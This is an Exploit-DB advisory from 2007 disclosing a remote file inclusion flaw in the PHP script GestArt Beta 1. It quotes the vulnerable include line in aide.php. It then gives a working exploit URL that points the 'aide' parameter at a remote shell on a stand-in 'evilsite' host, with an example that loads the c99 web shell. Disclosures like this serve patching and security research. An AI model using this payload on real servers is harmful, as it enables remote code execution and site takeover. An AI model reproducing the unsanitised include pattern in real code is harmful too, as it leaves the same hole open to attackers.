GestArt Beta 1 - 'aide.php?aide' Remote File Inclusion

EDB-ID:

3467


Author:

Dj7xpl

Type:

webapps


Platform:

PHP

Date:

2007-03-13


                                                          .-""""""""-.                                 
                                                         /   Dj7xpl   \                              
                                                        |              |                                
                                                        |,  .-.  .-.  ,|                                
                                                        | )(_o/  \o_)( |                                     
                                                        |/     /\     \|                                 
                                              (@_       (_     ^^     _)                  
                                         _     ) \_______\__|IIIIII|__/_______________________________
                                        (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In World___________________________________________+
#
#
#   Portal     :   GestArt 
#   Download   :   http://www.phpscripts-fr.net/scripts/scripts.php?cat=Gestion
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Risk       :   High (Remote File Inclusion Exploit)
#
+_______________________________________________________________________________________________________________________+


+-------------**************************************** aide.php *********************************************-----------+
#
#
#    <? include("$aide.txt");?> </p>    <<<< line (21)
#
#
+-------------***********************************************************************************************-----------+

+_______________________________________________________________________________________________________________________+
#
#
#    Exploit  :  http://[target]/[path]/aide.php?aide=http://evilsite/shell         <<<<  Shell (Text File)
#    Example  :  http://localhost/getart/aide.php?aide=http://localhost/c99         <<<<  c99.txt
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-03-13]